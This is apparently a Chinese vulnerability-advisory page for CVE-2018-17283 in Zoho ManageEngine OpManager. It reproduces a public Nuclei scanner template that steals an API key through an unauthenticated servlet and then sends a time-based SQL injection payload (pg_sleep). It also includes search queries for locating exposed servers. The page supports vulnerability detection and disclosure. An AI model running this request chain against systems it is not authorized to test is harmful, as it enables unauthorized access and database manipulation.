CVE-2018-17283: Zoho ManageEngine OpManager - SQL Injection

日期: 2025-08-01 | 影响软件: Zoho ManageEngine OpManager | POC: 已公开

漏洞描述

Zoho ManageEngine OpManager before 12.3 Build 123196 does not require authentication for /oputilsServlet requests, as demonstrated by a /oputilsServlet?action=getAPIKey request that can be leveraged against Firewall Analyzer to add an admin user via /api/json/v2/admin/addUser or conduct a SQL Injection attack via the /api/json/device/setManaged name parameter.

PoC代码[已公开]

id: CVE-2018-17283

info:
  name: Zoho ManageEngine OpManager - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    Zoho ManageEngine OpManager before 12.3 Build 123196 does not require authentication for /oputilsServlet requests, as demonstrated by a /oputilsServlet?action=getAPIKey request that can be leveraged against Firewall Analyzer to add an admin user via /api/json/v2/admin/addUser or conduct a SQL Injection attack via the /api/json/device/setManaged name parameter.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-17283
    cwe-id: CWE-89
    epss-score: 0.35826
    epss-percentile: 0.96974
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/x-f1v3/forcve/issues/4
    - https://nvd.nist.gov/vuln/detail/CVE-2018-17283
  metadata:
    verified: true
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query: http.title:"OpManager"
    fofa-query: title="OpManager"
  tags: cve,cve2018,oputils,zoho,opmanager,sqli,time-based-sqli

http:
  - raw:
      - |
        GET /oputilsServlet?action=getAPIKey HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        name: api_key
        regex:
          - 'API_KEY=([0-9a-z]+)'
        internal: true

  - raw:
      - |
        POST /api/json/device/setManaged?apiKey={{api_key}}&manage=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        name=KcP7OGhC';select%20pg_sleep(6);%20--

    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - 'contains(body,"result")'
          - 'contains(content_type,"application/json")'
        condition: and
# digest: 490a0046304402201de231ae9b264de83df91e31dc22b05d425995d2f050d64005857f3df0188f5602206c9def69429a7b2c97aaf2fb51ec8479587d20259f6244f15a48f9b996fffc52:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-17283.yaml

相关漏洞推荐